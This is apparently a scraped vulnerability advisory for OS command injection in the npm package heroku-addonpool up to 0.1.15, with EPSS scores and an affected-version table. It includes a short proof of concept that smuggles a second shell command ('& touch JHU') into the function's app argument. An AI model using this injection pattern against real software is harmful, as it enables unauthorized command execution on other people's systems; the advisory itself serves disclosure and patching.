Lucene search

K
osvGoogleOSV:GHSA-3Q9X-W53P-JG53
HistoryDec 09, 2021 - 7:52 p.m.

OS Command Injection in heroku-addonpool

2021-12-0919:52:03
Google
osv.dev
4

0.268 Low

EPSS

Percentile

96.8%

heroku-addonpool through 0.1.15 is vulnerable to Command Injection. The second parameter of the exported function HerokuAddonPool(id, app, opt) can be controlled by users without any sanitization.

PoC

var Root = require("heroku-addonpool");
var root = Root("sss", "& touch JHU", {});
root.setup();
CPENameOperatorVersion
heroku-addonpoollt0.1.16

0.268 Low

EPSS

Percentile

96.8%

Related for OSV:GHSA-3Q9X-W53P-JG53